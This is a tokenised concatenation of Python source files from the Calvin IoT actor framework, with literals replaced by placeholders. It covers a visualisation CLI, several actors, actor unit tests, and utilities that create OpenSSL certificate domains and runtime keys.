PadViz ( p , '<STR_LIT>' ) for p in comp_def [ '<STR_LIT>' ] ] <EOL> self . outpads = [ PadViz ( p , '<STR_LIT>' ) for p in comp_def [ '<STR_LIT>' ] ] <EOL> self . padlinks = [ LinkViz ( link ) for link in comp_def [ '<STR_LIT>' ] [ '<STR_LIT>' ] if link [ '<STR_LIT:src>' ] == '<STR_LIT:.>' or link [ '<STR_LIT>' ] == '<STR_LIT:.>' ] <EOL> def render ( self ) : <EOL> viz = [ '<STR_LIT>' ] <EOL> viz += [ '<STR_LIT>' ] <EOL> viz += [ str ( v ) for v in self . inpads ] <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> viz += [ '<STR_LIT>' ] <EOL> viz += [ str ( v ) for v in self . outpads ] <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> viz += [ '<STR_LIT>' . format ( self . name ) ] <EOL> viz . append ( str ( self ) ) <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> viz += [ str ( v ) for v in self . padlinks ] <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> return '<STR_LIT:\n>' . join ( viz ) <EOL> def visualize_deployment ( filename ) : <EOL> deployable , errors , warnings = cscompiler . compile_file ( filename ) <EOL> return AppViz ( deployable ) . render ( ) <EOL> def visualize_script ( filename ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as f : <EOL> source_text = f . read ( ) <EOL> ir , errors , warnings = calvin_parser ( source_text , '<STR_LIT:filename>' ) <EOL> return ScriptViz ( ir ) . render ( ) <EOL> def visualize_component_internals ( filename , component ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as f : <EOL> source_text = f . read ( ) <EOL> ir , errors , warnings = calvin_parser ( source_text , '<STR_LIT:filename>' ) <EOL> if component in ir [ '<STR_LIT>' ] : <EOL> comp_def = ir [ '<STR_LIT>' ] [ component ] <EOL> return CompInternalsViz ( comp_def ) . render ( ) <EOL> def main ( ) : <EOL> long_description = """<STR_LIT>""" <EOL> argparser = argparse . ArgumentParser ( <EOL> formatter_class = argparse . RawDescriptionHelpFormatter , <EOL> description = textwrap . dedent ( long_description ) <EOL> ) <EOL> argparser . add_argument ( '<STR_LIT>' , type = str , required = True , <EOL> help = '<STR_LIT>' ) <EOL> group = argparser . add_mutually_exclusive_group ( ) <EOL> group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , type = str , <EOL> help = '<STR_LIT>' ) <EOL> args = argparser . parse_args ( ) <EOL> exit_val = <NUM_LIT:0> <EOL> try : <EOL> if args . deployment : <EOL> res = visualize_deployment ( args . script ) <EOL> elif args . component : <EOL> res = visualize_component_internals ( args . script , args . component ) <EOL> else : <EOL> res = visualize_script ( args . script ) <EOL> print ( res ) <EOL> except Exception as e : <EOL> print e <EOL> exit_val = <NUM_LIT:1> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> from calvin . actor . actor import Actor , ActionResult , manage , condition , guard <EOL> from calvin . runtime . north . calvin_token import EOSToken , ExceptionToken <EOL> from copy import deepcopy <EOL> class SetValue ( Actor ) : <EOL> """<STR_LIT>""" <EOL> def exception_handler ( self , action , args , context ) : <EOL> return ActionResult ( production = ( ExceptionToken ( ) , ) ) <EOL> @ manage ( ) <EOL> def init ( self ) : <EOL> pass <EOL> def _type_mismatch ( self , container , key ) : <EOL> t_cont = type ( container ) <EOL> t_key = type ( key ) <EOL> return ( t_cont is list and t_key is not int ) or ( t_cont is dict and not isinstance ( key , basestring ) ) <EOL> @ condition ( [ '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ] , [ '<STR_LIT>' ] ) <EOL> def set_value ( self , data , key , value ) : <EOL> keylist = key if type ( key ) is list else [ key ] <EOL> container = deepcopy ( data ) <EOL> try : <EOL> res = container <EOL> for key in keylist [ : - <NUM_LIT:1> ] : <EOL> if self . _type_mismatch ( res , key ) : <EOL> raise Exception ( ) <EOL> res = res [ key ] <EOL> if self . _type_mismatch ( res , keylist [ - <NUM_LIT:1> ] ) : <EOL> raise Exception ( ) <EOL> res [ keylist [ - <NUM_LIT:1> ] ] = value <EOL> except : <EOL> container = ExceptionToken ( ) <EOL> return ActionResult ( production = ( container , ) ) <EOL> action_priority = ( set_value , ) <EOL> test_args = [ ] <EOL> test_kwargs = { } <EOL> test_set = [ <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : <NUM_LIT:1> } ] , '<STR_LIT:key>' : [ '<STR_LIT:a>' ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : <NUM_LIT> } ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ <NUM_LIT:1> ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:3> ] ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , { '<STR_LIT:a>' : <NUM_LIT:2> } , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ [ <NUM_LIT:1> , '<STR_LIT:a>' ] ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , { '<STR_LIT:a>' : <NUM_LIT> } , <NUM_LIT:3> ] ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] } ] , '<STR_LIT:key>' : [ [ '<STR_LIT:a>' , <NUM_LIT:1> ] ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:3> ] } ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ '<STR_LIT:a>' ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : <NUM_LIT:1> } ] , '<STR_LIT:key>' : [ <NUM_LIT:1> ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , { '<STR_LIT:a>' : <NUM_LIT:2> } , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> } , <EOL> ] </s>
<s> from calvin . actor . actor import Actor , ActionResult , manage , condition <EOL> class Counter ( Actor ) : <EOL> """<STR_LIT>""" <EOL> @ manage ( [ '<STR_LIT:count>' ] ) <EOL> def init ( self ) : <EOL> self . count = <NUM_LIT:0> <EOL> @ condition ( action_output = [ '<STR_LIT>' ] ) <EOL> def cnt ( self ) : <EOL> self . count += <NUM_LIT:1> <EOL> return ActionResult ( production = ( self . count , ) ) <EOL> action_priority = ( cnt , ) <EOL> def report ( self ) : <EOL> return self . count <EOL> test_args = [ ] <EOL> test_set = [ <EOL> { '<STR_LIT>' : { } , '<STR_LIT>' : { '<STR_LIT>' : [ n ] } } for n in range ( <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> ] </s>
<s> from calvin . utilities . calvinlogger import get_logger <EOL> _log = get_logger ( __name__ ) <EOL> class PublicAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , node , actor ) : <EOL> self . _node = node <EOL> self . _actor = actor <EOL> def exists ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return self . _node . attributes . has_public_attribute ( index ) <EOL> def get ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return self . _node . attributes . get_public ( index ) <EOL> def register ( node , actor ) : <EOL> return PublicAttribute ( node , actor ) </s>
<s> from calvin . actor . actor import Actor , ActionResult , condition <EOL> class Environmental ( Actor ) : <EOL> """<STR_LIT>""" <EOL> def init ( self ) : <EOL> self . setup ( ) <EOL> def setup ( self ) : <EOL> self . use ( "<STR_LIT>" , shorthand = "<STR_LIT>" ) <EOL> self . sensor = self [ "<STR_LIT>" ] <EOL> def did_migrate ( self ) : <EOL> self . setup ( ) <EOL> @ condition ( action_input = [ "<STR_LIT>" ] , action_output = [ "<STR_LIT:data>" ] ) <EOL> def get_data ( self , input ) : <EOL> data = "<STR_LIT>" % ( int ( self . sensor . get_temperature ( ) ) , <EOL> int ( self . sensor . get_humidity ( ) ) , <EOL> int ( self . sensor . get_pressure ( ) ) ) <EOL> return ActionResult ( production = ( data , ) ) <EOL> action_priority = ( get_data , ) <EOL> requires = [ "<STR_LIT>" ] </s>
<s> from calvin . utilities import dynops <EOL> def req_op ( node , actor_id = None , component = None ) : <EOL> """<STR_LIT>""" <EOL> it = dynops . List ( [ node . id ] ) <EOL> it . final ( ) <EOL> return it </s>
<s> from calvin . runtime . south . plugins . io . display import base_display <EOL> class Display ( base_display . DisplayBase ) : <EOL> """<STR_LIT>""" <EOL> def show_text ( self , text ) : <EOL> print text </s>
<s> from calvin . utilities import certificate <EOL> import os <EOL> print "<STR_LIT>" <EOL> testconfig = certificate . Config ( domain = "<STR_LIT:test>" ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> certificate . new_domain ( testconfig ) <EOL> print "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> for j in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> name = "<STR_LIT>" . format ( i , j ) <EOL> certreq = certificate . new_runtime ( testconfig , name ) <EOL> certificate . sign_req ( testconfig , os . path . basename ( certreq ) , name ) <EOL> certreq = certificate . new_runtime ( testconfig , "<STR_LIT>" ) <EOL> certificate . sign_req ( testconfig , os . path . basename ( certreq ) , "<STR_LIT>" ) </s>
<s> import pytest <EOL> from mock import Mock <EOL> from calvin . tests import DummyNode <EOL> from calvin . runtime . north . actormanager import ActorManager <EOL> from calvin . runtime . south . endpoint import LocalOutEndpoint , LocalInEndpoint <EOL> from calvin . actor . actor import Actor <EOL> pytestmark = pytest . mark . unittest <EOL> def create_actor ( node ) : <EOL> actor_manager = ActorManager ( node ) <EOL> actor_id = actor_manager . new ( '<STR_LIT>' , { } ) <EOL> actor = actor_manager . actors [ actor_id ] <EOL> actor . _calvinsys = Mock ( ) <EOL> return actor <EOL> @ pytest . fixture <EOL> def actor ( ) : <EOL> return create_actor ( DummyNode ( ) ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" , True ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" , True ) , <EOL> ] ) <EOL> def test_set_port_property ( port_type , port_name , port_property , value , expected ) : <EOL> assert actor ( ) . set_port_property ( port_type , port_name , port_property , value ) is expected <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( False , False , False ) , <EOL> ( False , True , False ) , <EOL> ( True , False , False ) , <EOL> ( True , True , True ) , <EOL> ] ) <EOL> def test_did_connect ( actor , inport_ret_val , outport_ret_val , expected ) : <EOL> for port in actor . inports . values ( ) : <EOL> port . is_connected = Mock ( return_value = inport_ret_val ) <EOL> for port in actor . outports . values ( ) : <EOL> port . is_connected = Mock ( return_value = outport_ret_val ) <EOL> actor . fsm = Mock ( ) <EOL> actor . did_connect ( None ) <EOL> if expected : <EOL> actor . fsm . transition_to . assert_called_with ( Actor . STATUS . ENABLED ) <EOL> assert actor . _calvinsys . scheduler_wakeup . called <EOL> else : <EOL> assert not actor . fsm . transition_to . called <EOL> assert not actor . _calvinsys . scheduler_wakeup . called <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( True , True , False ) , <EOL> ( True , False , False ) , <EOL> ( False , True , False ) , <EOL> ( False , False , True ) , <EOL> ] ) <EOL> def test_did_disconnect ( actor , inport_ret_val , outport_ret_val , expected ) : <EOL> for port in actor . inports . values ( ) : <EOL> port . is_connected = Mock ( return_value = inport_ret_val ) <EOL> for port in actor . outports . values ( ) : <EOL> port . is_connected = Mock ( return_value = outport_ret_val ) <EOL> actor . fsm = Mock ( ) <EOL> actor . did_disconnect ( None ) <EOL> if expected : <EOL> actor . fsm . transition_to . assert_called_with ( Actor . STATUS . READY ) <EOL> else : <EOL> assert not actor . fsm . transition_to . called <EOL> def test_enabled ( actor ) : <EOL> actor . enable ( ) <EOL> assert actor . enabled ( ) <EOL> actor . disable ( ) <EOL> assert not actor . enabled ( ) <EOL> def test_connections ( ) : <EOL> node = DummyNode ( ) <EOL> node . id = "<STR_LIT>" <EOL> actor = create_actor ( node ) <EOL> inport = actor . inports [ '<STR_LIT>' ] <EOL> outport = actor . outports [ '<STR_LIT>' ] <EOL> port = Mock ( ) <EOL> port . id = "<STR_LIT:x>" <EOL> peer_port = Mock ( ) <EOL> peer_port . id = "<STR_LIT:y>" <EOL> inport . attach_endpoint ( LocalInEndpoint ( port , peer_port ) ) <EOL> outport . attach_endpoint ( LocalOutEndpoint ( port , peer_port ) ) <EOL> assert actor . connections ( node ) == { <EOL> '<STR_LIT>' : actor . id , <EOL> '<STR_LIT>' : actor . name , <EOL> '<STR_LIT>' : { inport . id : ( node , "<STR_LIT:y>" ) } , <EOL> '<STR_LIT>' : { outport . id : [ ( node , "<STR_LIT:y>" ) ] } <EOL> } <EOL> def test_state ( actor ) : <EOL> inport = actor . inports [ '<STR_LIT>' ] <EOL> outport = actor . outports [ '<STR_LIT>' ] <EOL> correct_state = { <EOL> '<STR_LIT>' : set ( [ actor . id ] ) , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:id>' : actor . id , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:N>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : { inport . id : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : [ inport . id ] , <EOL> '<STR_LIT>' : { inport . id : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : <NUM_LIT:0> } , <EOL> '<STR_LIT:id>' : inport . id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' } } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : { '<STR_LIT:N>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : [ { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:data>' : <NUM_LIT:0> , '<STR_LIT:type>' : '<STR_LIT>' } ] , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : <NUM_LIT:0> } , <EOL> '<STR_LIT:id>' : outport . id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' } } } <EOL> test_state = actor . state ( ) <EOL> for k , v in correct_state . iteritems ( ) : <EOL> if isinstance ( v , set ) : <EOL> assert set ( test_state [ k ] ) == v <EOL> else : <EOL> assert test_state [ k ] == v <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( None , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] ) <EOL> def test_set_signature ( actor , prev_signature , new_signature , expected ) : <EOL> actor . signature_set ( prev_signature ) <EOL> actor . signature_set ( new_signature ) <EOL> assert actor . _signature == expected <EOL> def test_component ( actor ) : <EOL> actor . component_add ( <NUM_LIT:1> ) <EOL> assert <NUM_LIT:1> in actor . component_members ( ) <EOL> actor . component_add ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert <NUM_LIT:2> in actor . component_members ( ) <EOL> assert <NUM_LIT:3> in actor . component_members ( ) <EOL> actor . component_remove ( <NUM_LIT:1> ) <EOL> assert <NUM_LIT:1> not in actor . component_members ( ) <EOL> actor . component_remove ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert <NUM_LIT:2> not in actor . component_members ( ) <EOL> assert <NUM_LIT:3> not in actor . component_members ( ) <EOL> def test_requirements ( actor ) : <EOL> assert actor . requirements_get ( ) == [ ] <EOL> actor . requirements_add ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert actor . requirements_get ( ) == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> actor . requirements_add ( [ <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> assert actor . requirements_get ( ) == [ <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> actor . requirements_add ( [ <NUM_LIT:6> , <NUM_LIT:7> ] , extend = True ) <EOL> assert actor . requirements_get ( ) == [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] </s>
<s> """<STR_LIT>""" <EOL> import ConfigParser <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> import tempfile <EOL> import time <EOL> import random <EOL> import shutil <EOL> from calvin . utilities import confsort <EOL> import OpenSSL <EOL> from calvin . utilities import calvinuuid <EOL> from calvin . utilities import calvinconfig <EOL> from calvin . utilities . calvinlogger import get_logger <EOL> from calvin . utilities . utils import get_home <EOL> _log = get_logger ( __name__ ) <EOL> _conf = calvinconfig . get ( ) <EOL> BEGIN_LINE = "<STR_LIT>" <EOL> class Config ( ) : <EOL> """<STR_LIT>""" <EOL> DEFAULT = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:none>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> def __init__ ( self , configfile = None , domain = None , commonName = None , force = False , readonly = False ) : <EOL> self . configfile = configfile <EOL> self . commonName = commonName or '<STR_LIT>' <EOL> self . config = ConfigParser . SafeConfigParser ( ) <EOL> self . config . optionxform = str <EOL> os . umask ( <NUM_LIT> <NUM_LIT> ) <EOL> if configfile is not None : <EOL> self . configuration = self . parse_opensslconf ( ) <EOL> elif configfile is None and domain is not None : <EOL> self . domain = domain <EOL> homefolder = get_home ( ) <EOL> self . configfile = os . path . join ( homefolder , "<STR_LIT>" , <EOL> "<STR_LIT>" , domain , <EOL> "<STR_LIT>" ) <EOL> exist = os . path . isfile ( self . configfile ) <EOL> if not exist and readonly : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if exist and not force : <EOL> self . configuration = self . parse_opensslconf ( ) <EOL> print "<STR_LIT>" "<STR_LIT>" . format ( self . configfile ) <EOL> else : <EOL> self . new_opensslconf ( ) <EOL> self . configuration = self . parse_opensslconf ( ) <EOL> print "<STR_LIT>" "<STR_LIT:{}>" . format ( self . configfile ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def new_opensslconf ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = os . path . dirname ( self . configfile ) <EOL> for section in self . __class__ . DEFAULT . keys ( ) : <EOL> self . config . add_section ( section ) <EOL> print "<STR_LIT>" . format ( section ) <EOL> for option in self . __class__ . DEFAULT [ section ] : <EOL> if option == "<STR_LIT>" : <EOL> value = self . domain <EOL> elif option == "<STR_LIT>" : <EOL> value = directory <EOL> elif section == '<STR_LIT>' and option == '<STR_LIT>' : <EOL> value = self . commonName <EOL> else : <EOL> value = self . __class__ . DEFAULT [ section ] [ option ] <EOL> self . config . set ( section , option , value ) <EOL> print "<STR_LIT>" . format ( option , value ) <EOL> try : <EOL> os . makedirs ( directory , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError , e : <EOL> print e <EOL> with open ( self . configfile , '<STR_LIT:wb>' ) as configfd : <EOL> self . config . write ( configfd ) <EOL> configfd . close ( ) <EOL> confsort . reorder ( self . configfile ) <EOL> def parse_opensslconf ( self ) : <EOL> """<STR_LIT>""" <EOL> self . config . read ( self . configfile ) <EOL> configuration = { } <EOL> for section in self . __class__ . DEFAULT . keys ( ) : <EOL> for option in self . __class__ . DEFAULT [ section ] . keys ( ) : <EOL> raw = self . config . get ( section , option ) <EOL> value = raw . split ( "<STR_LIT:#>" ) [ <NUM_LIT:0> ] . strip ( ) <EOL> if "<STR_LIT:$>" in value : <EOL> variable = "<STR_LIT>" . join ( value . split ( "<STR_LIT:$>" ) [ <NUM_LIT:1> : ] ) <EOL> variable = variable . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> path = "<STR_LIT:/>" + "<STR_LIT:/>" . join ( value . split ( "<STR_LIT:/>" ) [ <NUM_LIT:1> : ] ) <EOL> varvalue = self . config . get ( section , variable ) <EOL> value = varvalue . split ( "<STR_LIT:#>" ) [ <NUM_LIT:0> ] . strip ( ) + path <EOL> try : <EOL> configuration [ section ] . update ( { option : value } ) <EOL> except KeyError : <EOL> configuration [ section ] = { } <EOL> configuration [ section ] . update ( { option : value } ) <EOL> return configuration <EOL> def incr ( fname ) : <EOL> """<STR_LIT>""" <EOL> fhandle = open ( fname , '<STR_LIT>' ) <EOL> current = int ( fhandle . readline ( ) , <NUM_LIT:16> ) <EOL> print ( current ) <EOL> current = current + <NUM_LIT:1> <EOL> fhandle . seek ( <NUM_LIT:0> ) <EOL> fhandle . write ( str ( format ( current , '<STR_LIT:x>' ) ) ) <EOL> fhandle . truncate ( ) <EOL> fhandle . close ( ) <EOL> return current <EOL> def touch ( fname , times = None ) : <EOL> """<STR_LIT>""" <EOL> fhandle = open ( fname , '<STR_LIT:a>' ) <EOL> try : <EOL> os . utime ( fname , times ) <EOL> finally : <EOL> fhandle . close ( ) <EOL> def fingerprint ( filename ) : <EOL> """<STR_LIT>""" <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , filename , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> try : <EOL> fingerprint = stdout . split ( "<STR_LIT:=>" ) [ <NUM_LIT:1> ] . strip ( ) <EOL> except ( IndexError , AttributeError ) : <EOL> errormsg = "<STR_LIT>" "<STR_LIT>" . format ( stderr ) <EOL> raise IOError ( errormsg ) <EOL> return fingerprint <EOL> def new_runtime ( conf , name , nodeid = None ) : <EOL> """<STR_LIT>""" <EOL> outpath = conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> name_dir = os . path . join ( conf . configuration [ "<STR_LIT>" ] [ "<STR_LIT>" ] , name ) <EOL> private_key = os . path . join ( name_dir , "<STR_LIT>" , "<STR_LIT>" ) <EOL> private = os . path . dirname ( private_key ) <EOL> out = os . path . join ( outpath , "<STR_LIT>" . format ( name ) ) <EOL> os . umask ( <NUM_LIT> <NUM_LIT> ) <EOL> try : <EOL> os . makedirs ( outpath , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> os . makedirs ( private , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError : <EOL> pass <EOL> organization = conf . domain <EOL> commonname = name <EOL> dnQualifier = "<STR_LIT>" if nodeid is None else nodeid <EOL> subject = "<STR_LIT>" . format ( organization , commonname , dnQualifier ) <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , private_key ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> log = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , subject , <EOL> "<STR_LIT>" , private_key , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , out ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> stdout , stderr = log . communicate ( ) <EOL> if log . returncode != <NUM_LIT:0> : <EOL> raise IOError ( stderr ) <EOL> return out <EOL> def remove_domain ( domain , directory = None ) : <EOL> """<STR_LIT>""" <EOL> homefolder = get_home ( ) <EOL> domaindir = directory or os . path . join ( homefolder , "<STR_LIT>" , "<STR_LIT>" , domain ) <EOL> configfile = os . path . join ( domaindir , "<STR_LIT>" ) <EOL> if os . path . isfile ( configfile ) : <EOL> shutil . 